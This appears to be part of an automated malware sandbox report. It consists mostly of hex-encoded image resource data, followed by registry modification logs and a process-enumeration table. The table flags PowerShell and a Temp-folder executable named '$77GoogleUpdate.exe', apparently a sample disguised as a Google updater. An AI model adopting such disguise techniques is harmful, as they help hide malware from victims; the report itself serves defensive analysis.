00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff0000000000000000
0000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff00000000
0000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000
00000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf00000000
[Raw hex dump omitted. This part of the report reproduced the contents of a binary artifact as one continuous hexadecimal string with no filename, offset or header; the data consists almost entirely of repeating 32-bit values (00000000, ffffffff, 888888bf) consistent with bitmap pixel data and carries no analysis information beyond that.]
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf3030303000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000424d3e000000000000003e0000002800000010000000400200000100010000000000000900000000000000000000000000000000000000000000ffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe00000000
0000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000f0410000c00000008190000093800000138400000000000033c1000077fe000077ee000033cc00000000000013c8000093c9000081810000c0030000f00f0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000fff100008000000000000000000000000000000000000000000000000001000080070000e0070000c00f0000ce3f0000ffff0000ffff0000ffff0000ffff0000ffff0000ffff0000f000000000000000000000000000
C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "140" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "9852" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "9852" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "4051" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "4051" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-929662420-1054238289-2961194603-1000\{54877B69-094E-46DB-BBD6-85AB58A41C20} C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "173" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "173" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "173" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "4051" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133065036373276371" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "888" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "9852" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
